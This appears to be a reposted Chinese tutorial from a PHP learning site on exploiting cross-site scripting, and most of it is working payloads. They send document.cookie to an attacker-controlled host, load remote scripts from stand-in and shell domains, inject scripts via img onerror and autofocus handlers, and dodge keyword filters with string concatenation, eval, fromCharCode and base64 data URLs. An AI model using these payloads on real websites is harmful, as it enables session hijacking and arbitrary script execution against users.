来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 在早期 , 对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长...
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端 一个简单的例子 <script src=http://xxx.xxx/a.js></script> 这样更为简洁 <script src=//xxx.xxx/a.js></script> src属性会自己取当前页面的协议。 对于可以执行js的属性,我们可以控制其内容的话,可以基于DOM的方法创建和插入节点调用js <img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'> 不要忘记 autofocus无须交互即可执行js。 <input autofocus="" onfocus="........" /> 过滤了 script ‘ create 等关键字的话。 各种编码绕过即可。 你可以看下jin的这篇文章 http://drops.wooyun.org/tips/689 或者用String.fromCharCode 函数转换成 asc码 <script>z='document.'</script> <script>z=z+'write("'</script> <script>z=z+'<script'</script> <script>z=z+' src=ht'</script> <script>z=z+'tp://ww'</script> <script>z=z+'w.shell'</script> <script>z=z+'.net/1.'</script> <script>z=z+'js></sc'</script> <script>z=z+'ript>")'</script> <script>eval_r(z)</script> 我们也可以用data url 来加载。 <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4="></object> <iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4="></iframe> PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4= 是 <script src=http://xxx.xxx/a.js></script> 的base64值。 <anchor>、<img> <a>(需点击) <meta>..... 需注意的是 <img> 里的 data url 是不允许执行js的。
<frame> 标签的src设置data URL 有时候 我们可以直接调用javascript框架的函数 来实现一些功能。 $.getScript("//xxx.xxx/a.js"); 实践出真理! 作者:roker『webvul』root@webvul.com
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com